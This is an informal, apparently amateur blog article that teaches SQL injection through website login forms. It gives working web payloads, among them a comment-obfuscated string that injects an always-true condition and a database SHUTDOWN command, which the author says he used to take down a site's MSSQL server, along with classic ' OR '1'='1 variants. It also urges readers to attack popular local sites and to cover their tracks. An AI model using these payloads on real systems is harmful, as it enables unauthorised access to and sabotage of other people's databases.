At the time of writing this article,
Their is one website that i've hacked before using a pretty basic SQL injection but I've helped them patch up most of it, but it doesn't mean it still isn't injectable.
Alright, Their is more than one way of SQL Injecting ones website. the easiest example is get parameters. a get parameter is pretty simple. a get parameter is pretty much whats in bold from the following string. http://someWebsite.com/forum?fid=3. or in better words anything after a ? is a get parameter. most of the time seeing a ? and the word id or anything in the likes is instantly known to be either A: connecting to a database, or doing some sort of short hand processing before being sent to a database.
however, this isn't what I'm going to be talking about in this article. I am going to be talking about basic FORMed sql injection. a form is like a login page. each time you fill in the fields, the fields are part of the form, including the submit/login button. thats a great place to begin a basic SQL Injection attack.
Things you could do to create a basic successful attack is try altering the tables. What I mean by this, is try to force a MySQL error. just to test try typing '/*Commented*/ into one of the fields, repeat the same thing again, and look out for a error. If you see a field validation error, that page has validation and cannot be hacked into that easily.
try looking for another exploit. try adding a \ before every tick mark. for example before we were just typing '/*Commented*/ now its going to look like this -> \'/*Commented*/. and the list can go on. we c an fool the best of validation systems by doing things in orders like this.
one website, I hacked into earlier I used the following to gain information and pretty much shutdown their mssql instance.
\'/**/O/**/R /**/1/***/=/***/\'/**/1/**/\'/***/;/***/S/**/H/**/U/**/T/**/D/**/OW/***/N W/**/IT/**/H /**/N/***/OW/***/AI/**/T/**/;/****/-/***/-/****/
look at the above example.
a /* and */ is a basic comment. just doing /* A Coomment */ in between letters can mess up a validation system. -- is also a comment, but it has no end tag unlike /* */.
Just knowing basic SQL Syntax can help you in SQL Injection. some of the most popular local sites around your area, never know they have bugs unless you begin exploiting them.
one of the most popular exploits is the ' OR '1' == '1' combo. their are many variations to it. for example:
a' OR 'a' == 'a'
' or '' = ''
their are a lot more but i cannot get in depth with you.
THE FOLLOWING ARTICLE IS MEANT AS A INSTRUCTIONAL ARTICLE. THE USE OF THIS ARTICLE IS ETHICAL AND MAY NOT BE TRACED BACK TO ME. BE CAREFUL WHERE YOU USE EXPLOITS AS YOU MAY NOT ALWAYS ERASE YOUR TRACKS.